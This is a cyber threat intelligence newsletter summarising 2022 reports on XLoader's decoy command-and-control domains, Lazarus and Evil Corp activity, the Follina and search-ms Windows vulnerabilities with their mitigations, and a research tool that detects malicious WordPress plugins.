Newest XLoader Versions Use Probability Theory to Hide Their C2 Server Domains Amongst Sixty-Three Decoys
The newest versions of the evolving "XLoader" botnet have been observed using probability theory to obscure their command-and-control (C2) infrastructures from analysts and lower the risk of losing nodes via tracking, identifying, and blocking. XLoader, an information-stealer botnet, was first discovered in January of 2021, and is known as the successor of the "Formbook" malware, which has a history of targeting both Windows and macOS systems. CheckPoint researchers conducted analysis of XLoader and determined that malware creators developed a way to mask the true C2 infrastructure among a series of decoys. CheckPoint researchers detailed XLoader 2.3 previously began concealing its C2 servers by using sixty-three (63) decoy domains in a configuration with the real C2 domain. Sixteen (16) domains are randomly added to a list by the malware for C2 communication. XLoader 2.5, after each attempt to access the selected domains, partially overwrites the first eight (8) domains listed with new random values within the collection of sixty-four (64) domains. The real C2 domain has a chance of being anywhere in the list. Researchers explained that "if the real C&C domain is in the second part of the list, it is accessed in every cycle once in approximately every 80-90 seconds. If it appears in the first part of the list, it will be overwritten in the next cycle with another random domain name." If the real C2 domain is amongst the first eight (8) domains in the list, then "the probability that a real C&C server will be accessed in the next cycle is 7/64 or 1/8,” which is dependent on the position of the specific fake C2 servers. This feature demands analysts to perform "a lengthy emulation to derive the actual C2 address, which is an atypical practice and renders all automated scripts useless," allowing two (2) goals to be achieved: the first being to disguise the real C2 server in common sandbox emulations, and the second to maintain the effectiveness of the malware. It is important to note that "it would be unlikely for XLoader not to contact the genuine C2 address after an hour after infection." The newest XLoader version (XLoader 2.6) has one (1) functionality change, in which the real C2 server domain is "now accessed in every communication cycle, or once in approximately 80-90 seconds," when run on a x64 system. When run in a x86 system (as currently many sandboxes still use x86 virtual machines), the real C2 domain has the same access probability as the decoy and fraudulent domains. A list of indicators of compromise (IOCs) as well as screenshots of the above process can be viewed in CheckPoint's report linked below.
Threat Actor Activity
Lazarus Espionage Campaign Targeting LinkedIn/WhatsApp Users
Since late 2021, threat actors from the Lazarus Group have been using sophisticated backstop personas to target defense contractors in Europe and the Middle East. The primary aim of their campaign appears to be cyber espionage, though they had made unsuccessful attempts to benefit financially as well. Actors utilized social platforms such as LinkedIn and WhatsApp, posing their backstop personas as job recruiters and delivering malware-laced job description documents to end users. When the original campaign occurred in 2020, users within Brazil, Czech Republic, Ukraine, Turkey, and Qatar were the victims of this campaign, however in the most recent campaign users from France, Italy, Spain, Netherlands, and Poland are now being targeted. Threat actors often rode on the backs of legitimate recruitment services to mask their approach and build trust between them and the end user. While the specific types of malicious programs were not disclosed, it is likely the malware exfiltrated information on the end user from system information to personal identifiable information. CTIX analysts urge users to never open attachments or hyperlinks sent from random users in order to lessen the risk of threat actor compromise.
UNC2165 Connections to Evil Corp Cybercriminal Organization
Security researchers at Mandiant have uncovered high confidence connections between the threat group UNC2165 and the notorious cybercriminal organization Evil Corp. In an attempt to evade United States sanctions, Evil Corp shifted to a Ransomware-as-a-Service threat model. Analysis of recent UNC2165 cyber-attacks show significant overlap in attributed indicators of compromise between UNC2165 and Evil Corp. Such overlaps include linked command-and-control (C2) servers and similar coding structures within malicious payloads. Analysis of previous UNC2165 attack tactics, techniques, and procedures (TTPs) show that these actors favor intrusion methods through another financially motivated threat group UNC1543. These threat actors often deployed "FAKEUPDATES" as the breaching payload on the target system, followed up by "DRIDEX" deployments ultimately leading to "BITPAYMER" or "DOPPELPAYMER" ransomware infections. Evil Corp has utilized the deployment of these malicious payloads in the past, which allowed for analysts to see indicators of compromise (IOCs) and trace connections between both groups. Evil Corp has utilized several more ransomware variants in their attacks such as "GOLD WINTER" and "PHEONIXLOCKER," but these attacks only strengthen the relation between Evil Corp and UNC2165. CTIX analysis will continue to monitor threat actor activity worldwide and provide updates as needed.
Opatch Unofficially Patches Zero-Day MSDT URI Protocol Handler Vulnerability but Researchers Quickly Uncover Another URI Protocol Flaw
UPDATE to 5/31/2022 FLASH UPDATE: The Opatch micropatching service released an unofficial patch that mitigates a critical zero-day vulnerability known as "Follina" (tracked as CVE-2022-30190), which allows threat actors to weaponize Word documents to locally execute remotely hosted malicious PowerShell scripts, leading to arbitrary code execution (ACE), utilizing the privileges of the calling application. The flaw specifically impacts the URI protocol handler for the Microsoft Windows Support Diagnostic Tool (MSDT), and if exploited, could allow attackers to install malicious programs, and conduct a host of other malicious activity without user interaction. In a Twitter post, Opatch explained that their patch does not disable the MSDT URI protocol handler (like Microsoft's manual mitigation technique), and instead sanitizes the missing user-provided path. Unfortunately, this type of URI protocol handler flaw is not exclusive to the MSDT, and shortly after the MSDT vulnerability was unofficially patched, security researcher and co-founder of Hacker House, Matthew Hickey tweeted a new proof-of-concept (PoC) exploit that was able to convert the existing MSDT vulnerability to exploit another zero-day flaw in the Windows Search URI protocol handler known as "search-ms". The Windows Search function is integrated into all Explorer windows, and "enables users to quickly search for files and items by file name, properties, and full-text contents." The search-ms URI protocol handler, much like the MSDT handler, allows for interacting with remote hosts, allowing Hickey to successfully exploit this weakness by combining a Microsoft Office OLEObject flaw with the search-ms URI protocol handler to open a remote search window by simply opening a Word document. The successful exploitation of this vulnerability would allow threat actors to socially engineer victims into conducting actions that automatically open search windows and launch malware locally. These fundamental vulnerabilities are much like the infamous Windows "PrintNightmare" Print Spooler flaws, where the privilege escalation and command execution vulnerabilities would be patched by Microsoft, but threat actors would quickly find new vulnerabilities due to the underlying weakness in the Print Spooler itself. In response to this threat, Microsoft will likely need to take steps to eliminate the opportunity for URI protocol handlers to be launched without any user interaction. To mitigate the search-ms flaw for the time-being, administrators can utilize the same type of manual mitigation techniques used for the MSDT vulnerability, by deleting the search-ms protocol handler from the Windows Registry. To download the free Opatch for the MSDT vulnerability, administrators should register an Opatch account, which will automatically install the patch locally once the Opatch agent is installed. The CTIX team will closely monitor the exploitation of this flaw, and updates may be released in future FLASH Updates.
- Bleeping Computer: Follina Patch Article
- Bleeping Computer: search-ms Vulnerability Article
- Opatch: Follina Tweet
- Opatch: search-ms Tweet
Researchers Discover Forty-Seven Thousand Malicious Plugins Using New Scanning Tool
Researchers from Georgia Institute of Technology developed an automated framework called “YODA” to detect malicious WordPress plugins and identify their origins. WordPress is a content management system (CMS) written in PHP that allows webmasters to create and manage a website without needing to program or develop the website itself. The WordPress platform allows the webmaster to install plugins that add features or alter the content programmatically. The plugins are often hosted on a marketplace, where developers can charge for the use of the plugin. While the marketplaces are full of useful plugins, threat actors often upload malicious plugins that trojanize or disguise themselves as popular plugins. This allows the attacker to embed their own malicious code in the webserver to implant webshells, mine cryptocurrency on visitors' machines, and even steal credentials or skim credit card information. Since WordPress sites are hosted on the internet, they are open to search engines and scans that can detect the malicious plugins. The researchers ran YODA against over 410,000 unique web servers, dating back to 2012. The scan resulted in over 47,337 malicious plugins on 24,931 unique websites, with $834,000 in plugins that were infected post-deployment. The researchers also integrated the application with the CMS, allowing webmasters to download it and scan their own websites for malicious plugins. CTIX analysts recommend individuals and organizations managing WordPress instances install YODA into their own server to prevent the spread of these malicious plugins.
The Ankura semi-weekly Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The following is a collection of cyber threat intelligence leads assembled over the past few days and typically include high-level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to Flash (firstname.lastname@example.org) if additional context is needed.
© Copyright 2022. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.